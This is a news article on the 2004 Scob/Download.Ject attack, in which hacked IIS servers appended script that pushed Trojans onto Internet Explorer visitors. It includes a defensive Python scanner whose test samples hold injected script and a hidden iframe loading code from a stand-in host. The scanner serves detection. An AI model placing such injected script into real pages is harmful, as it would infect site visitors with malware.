Visitors to a number of Websites, primarily through Microsoft Internet Explorer, are getting something they didn't need: an infection called Scob that causes them to unwittingly pick up programs like Trojan horses and other malware which hackers can use to plant other backdoors that steal sensitive data from their computers.
The affected Websites have not been disclosed at this writing. "We won't list the sites that are reported to be infected in order to prevent further abuse," said an announcement from the Internet Storm Center at the SANS Institute, a collaborative between universities and private researchers, "but the list is long and includes businesses that we presume would normally be keeping their sites fully patched."
This is different from viruses spreading by e-mail, security experts said within hours of the bug's appearance on June 25. They say all you have to do is visit an infected Website – which you won't really know is infected – that runs Microsoft's IIS 5.0 program for Web servers, and you could pick up a Trojan horse that could install anything from a keystroke logger or a proxy server to other back door bugs, giving the hackers full access to your system.
Security firm Sophos said early June 25 that Microsoft Internet Explorer users who visit pages infected by the bug might find their computers trying to download a file from an as-yet unidentified Russian Website. Microsoft has issued a critical alert and is pressing Windows users to download protection updates at once.
The Internet Storm Center said the affected Websites might have been compromised for this bug earlier this week.
"If a user visited an infected site," SANS said, "the Javascript delivered by the site would instruct the user's browser to download an executable from a Russian web site and install it. Different executables were observed. These Trojan horse programs include keystroke loggers, proxy servers and other back doors providing full access to the infected system."
"We are investigating a case called 'RFI - Russian IIS Hacks?' by Sans.org," said the security response team of antivirus/security product maker F-Secure early June 25. "Some of the files at the hacked sites have been modified – a Trojan downloader known as Scob has been appended to the end of the files, causing Internet Explorer to execute it."
F-Secure said Scob was discovered in earnest "from a number of Websites" late June 24. "The Trojan has been found to be appended to existing files at those web servers, for example pictures such as jpeg files," said a company advisory. "According to reports, the script has not been appended by modifying the actual files on the server but using the so called footer feature from Microsoft's Internet Information Server.
"When executed, the Trojan attempts to use an invisible frame to connect to a page at a remote Website," the advisory continued. "At the time of writing, the page in the Website is not available."
F-Secure also believes Scob's downloader has been used to install variants of the Padolor backdoor, which was the brainchild of the Russian hacking group HangUp Team and which steals personal information including credit information, logins, passwords, and other sensitive data. A variant known as Padolor.w was found early June 25, as Scob began hitting the Web in earnest.
While Scob is not the first Trojan ever to be attached to a Website, SANS said that what made Scob so alarming was that it affects a large number of servers and can't yet be detected as easily as earlier Trojans had been.
Scob is also known as Download.Ject or Toofer, according to Sophos.
"JS.Scob.Trojan is a simple Trojan that executes a JavaScript file from a remote server," said an advisory from Symantec, the makers of Norton Antivirus. "The Trojan's dropper sets it as the document footer for all pages served by IIS Web sites on the infected computer."
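The two descriptions above (F-Secure's account of script riding on the IIS footer feature, even on image files, and Symantec's note that the dropper sets the document footer for every page the server delivers) point to a simple server-side check a site operator can run: anything the server appends after a page's closing tag, or any markup at all inside an image body, is suspect. The following is an added example written for this article, not code from SANS, F-Secure, Symantec or Microsoft. It inspects captured HTTP response bodies for those two symptoms plus the invisible frame F-Secure mentions. The sample responses, hostnames and the specific heuristics are constructed for illustration.

```python
import re
from typing import List, Tuple, Dict

# Markup that should never trail a finished page or appear inside an image body.
ACTIVE_MARKUP_RE = re.compile(rb"<\s*(script|iframe|object|embed)\b", re.IGNORECASE)
# Last closing </html> tag; anything after it is a candidate injected footer.
HTML_END_RE = re.compile(rb"</\s*html\s*>", re.IGNORECASE)
# A frame made invisible by zero size or CSS, the "invisible frame" pattern.
HIDDEN_FRAME_RE = re.compile(
    rb"<\s*iframe\b[^>]*(?:width\s*=\s*[\"']?0\b|height\s*=\s*[\"']?0\b|display\s*:\s*none)",
    re.IGNORECASE,
)


def inspect_response(content_type: str, body: bytes) -> List[str]:
    """Return a list of human-readable findings for one captured response body."""
    findings: List[str] = []
    media_type = content_type.split(";")[0].strip().lower()

    if media_type in ("text/html", "application/xhtml+xml"):
        # A footer appended by the server lands after the page's own </html>.
        closing_tags = list(HTML_END_RE.finditer(body))
        if closing_tags:
            trailer = body[closing_tags[-1].end():]
            if ACTIVE_MARKUP_RE.search(trailer):
                findings.append("active markup appended after </html>")
        if HIDDEN_FRAME_RE.search(body):
            findings.append("hidden iframe present")
    else:
        # Images and other non-HTML bodies should contain no markup at all;
        # a footer blindly appended to a JPEG shows up here.
        if ACTIVE_MARKUP_RE.search(body):
            findings.append(f"script/frame markup inside {media_type} body")
    return findings


def scan_responses(responses: List[Tuple[str, str, bytes]]) -> Dict[str, List[str]]:
    """Map each URL that produced findings to its list of findings."""
    flagged: Dict[str, List[str]] = {}
    for url, content_type, body in responses:
        findings = inspect_response(content_type, body)
        if findings:
            flagged[url] = findings
    return flagged


# Constructed sample captures (hostnames use the reserved .invalid TLD).
JPEG_STUB = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16 + b"\xff\xd9"
SAMPLE_RESPONSES: List[Tuple[str, str, bytes]] = [
    ("http://example.invalid/index.html", "text/html",
     b"<html><body><h1>Welcome</h1></body></html>\r\n"),
    ("http://example.invalid/news.html", "text/html; charset=iso-8859-1",
     b"<html><body><p>News</p></body></html>"
     b"<script>document.write('<iframe src=\"http://remote.invalid/x\" "
     b"width=0 height=0></iframe>')</script>"),
    ("http://example.invalid/logo.jpg", "image/jpeg",
     JPEG_STUB + b"<script src=\"http://remote.invalid/x.js\"></script>"),
    ("http://example.invalid/photo.jpg", "image/jpeg", JPEG_STUB),
]

if __name__ == "__main__":
    for url, findings in scan_responses(SAMPLE_RESPONSES).items():
        print(url)
        for finding in findings:
            print("   -", finding)
```

Run against real captures, the input would be response bodies pulled from a proxy log or fetched from the server's own content; the point is that the check compares what the server sends against what the file on disk should contain, which is exactly where a footer injected by server configuration rather than by file modification becomes visible.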
Symantec said Scob does not seem to affect DOS, Linux, Macintosh, Macintosh OS X, Novell Netware, OS/2, UNIX, or Windows 3.x systems.
"Users should be aware that any Website, even those that may be trusted by the user, may be affected by this activity and thus contain potentially malicious code," said the federal government-directed Computer Emergency Readiness Team, in a warning it posted late June 24, when indications of Scob were first reported.
For further information, you should visit the Website of the company that makes your antivirus/computer security software package, including Symantec (Norton), F-Secure, and Sophos. You can also visit Microsoft's Website to get the latest information on Scob and, if need be, download appropriate updates for your Windows system.